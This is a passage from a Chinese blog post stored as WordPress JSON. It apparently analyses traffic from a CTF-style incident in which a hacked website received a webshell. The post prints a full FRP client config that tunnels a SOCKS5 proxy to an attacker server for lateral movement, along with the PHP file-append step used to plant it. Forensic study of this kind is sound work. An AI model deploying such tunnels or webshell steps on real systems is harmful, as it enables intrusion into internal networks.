    21:30<\/strong><\/td>\u8681\u5251\u8fde\u63a5\uff08ini_set<\/code>\/set_time_limit<\/code>\uff09<\/td>\u6301\u7eed\u63a7\u5236<\/td><\/tr>
    21:43<\/strong><\/td>\u8681\u5251\u91cd\u65b0\u8fde\u63a5\uff0c\u6536\u96c6\u7cfb\u7edf\u4fe1\u606f<\/td>\u4fe1\u606f\u6536\u96c6<\/td><\/tr>
    21:46<\/strong><\/td>\u5217\u76ee\u5f55<\/strong> \/var\/www\/html\/<\/code><\/td>\u67e5\u770b\u6587\u4ef6\u7ed3\u6784<\/td><\/tr>
    21:49<\/strong><\/td>\u5199\u5165FRP\u914d\u7f6e<\/strong> frpc.ini<\/code><\/td>\u5185\u7f51\u96a7\u9053\u51c6\u5907<\/strong><\/td><\/tr>
    21:52<\/strong><\/td>\u518d\u6b21\u5217\u76ee\u5f55<\/strong>\uff0c\u786e\u8ba4\u6587\u4ef6\u5199\u5165<\/td>\u9a8c\u8bc1\u914d\u7f6e<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
    \u5b9e\u9645\u653b\u51fb\u884c\u4e3a\u5206\u6790<\/strong><\/p>\n\n\n\n
      \n
    1. \u6587\u4ef6\u64cd\u4f5c<\/strong><\/li>\n<\/ol>\n\n\n\n
        \n
      • \u76ee\u6807\u6587\u4ef6<\/strong>\uff1afrpc.ini<\/code>\uff08FRP \u5ba2\u6237\u7aef\u914d\u7f6e\u6587\u4ef6\uff09\u3002<\/li>\n\n\n\n
      • \u64cd\u4f5c\u7c7b\u578b<\/strong>\uff1a\u901a\u8fc7fwrite(fopen($f, \"a\"), $buf)<\/code>\u8ffd\u52a0\u5185\u5bb9\u5230\u6587\u4ef6\u4e2d\uff0c\u5b9e\u73b0\u914d\u7f6e\u6587\u4ef6\u7684\u4fee\u6539\u6216\u521b\u5efa\u3002<\/li>\n<\/ul>\n\n\n\n
          \n
        1. \u5185\u7f51\u7a7f\u900f\u5de5\u5177\u90e8\u7f72<\/strong><\/li>\n<\/ol>\n\n\n\n
            \n
          • FRP \u914d\u7f6e\u5185\u5bb9 <\/li>\n<\/ul>\n\n\n\n
            [common] server_addr = 192.168.239.123 \nserver_port = 7778 \ntoken=Xa3BJf2l5enmN6Z7A8mv \n[test_socks5] type = tcp \nremote_port = 8111 \nplugin = socks5 \nplugin_user = 0HDFt16cLQJ\nplugin_passwd = JTN276Gp \nuse_encryption = true \nuse_compression = true<\/code><\/pre>\n\n\n\n
              \n
            • \u529f\u80fd<\/strong>\uff1a\u5efa\u7acb SOCKS5 \u4ee3\u7406\uff0c\u5c06\u5185\u7f51 8111 \u7aef\u53e3\u8f6c\u53d1\u5230\u8fdc\u7a0b\u670d\u52a1\u5668192.168.239.123:7778<\/code>\uff0c\u7528\u4e8e\u6a2a\u5411\u79fb\u52a8\u3002<\/li>\n<\/ul>\n\n\n\n
              \u4fe1\u606f\u6536\u96c6 \u2192 \u6f0f\u6d1e\u63a2\u6d4b \u2192 \u6743\u9650\u83b7\u53d6 \u2192 \u6743\u9650\u7ef4\u6301 \u2192 \u5185\u7f51\u6e17\u900f\n    \u2193         \u2193         \u2193         \u2193         \u2193\n  \u76ee\u5f55\u626b\u63cf   LFI\u6d4b\u8bd5   \u5199WebShell  \u8681\u5251\u63a7\u5236   FRP\u96a7\u9053<\/code><\/pre>\n\n\n\n
              \u788e\u788e\u5ff5\uff1a<\/h2>\n\n\n\n
              \u8fd9\u9053\u6d41\u91cf\u5206\u6790\u9898\u505a\u7684\u597d\u7cbe\u5f69\uff0c\u6211\u5728\u6709\u522b\u4ebawp\u800c\u4e14\u6709AI\u5e2e\u52a9\u7684\u57fa\u7840\u4e0a\u590d\u73b0\uff0c\u7528\u4e86\u56db\u4e2a\u591a\u5c0f\u65f6\u3002\u505a\u8fd9\u9053\u9898\u7684\u65f6\u5019\u592a\u7cbe\u5f69\u4e86\uff0c\u7b2c\u4e00\u6b21\u505a\u8fd9\u4e2a\u90a3\u4e48\u6df1\u7684\u6e17\u900f\u6709\u5173\u7684\u5e94\u6025\u9898\u3002\u5b66\u5230\u4e86\u5f88\u591a\u4e1c\u897f\uff0c\u4e5f\u770b\u51fa\u81ea\u5df1\u5bf9\u6e17\u900f\u7684\u77e5\u8bc6\u50a8\u5907\u592a\u5c11\u4e86\u800c\u4e14\u5bf9\u64cd\u63a7AI\u7cbe\u51c6\u5b8c\u6210\u4efb\u52a1\u7684\u80fd\u529b\u592a\u5f31\u4e86\u3002\u3002\u3002\u3002\u4f9d\u65e7\u201d\u83dc\u5c31\u591a\u7ec3\u201c\uff0c\u52a0\u6cb9~~~<\/p>\n","protected":false},"excerpt":{"rendered":"
              \u8fd9\u7bc7\u535a\u5ba2\u6211\u4ee5\u505a\u9898\u7684\u89c6\u89d2\u5148\u8fdb\u884c\u590d\u73b0\u8fd8\u539f\uff0c\u518d\u4ee5\u7eaf\u7cb9\u5206\u6790\u7684\u89d2\u5ea6\u5bf9\u8fd9\u4e2a\u6d41\u91cf\u8fdb\u884c\u5206\u6790\uff0c\u5e0c\u671b\u5404\u4f4d\u5927\u4f6c\u4eec\u591a\u591a\u6279\u8bc4\u6307\u6b63 \u4e00\u95ee \u5355\u4f4d\u7f51\u7ad9\u88ab\u9ed1\u5ba2\u6302\u9a6c\uff0c …<\/p>\n","protected":false},"author":1,"featured_media":1147,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_gspb_post_css":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[9,10],"tags":[],"class_list":["post-1079","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-misc","category-10"],"_links":{"self":[{"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts\/1079","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/comments?post=1079"}],"version-history":[{"count":30,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts\/1079\/revisions"}],"predecessor-version":[{"id":1134,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts\/1079\/revisions\/1134"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/media\/1147"}],"wp:attachment":[{"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/media?parent=1079"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/categories?post=1079"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/tags?post=1079"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}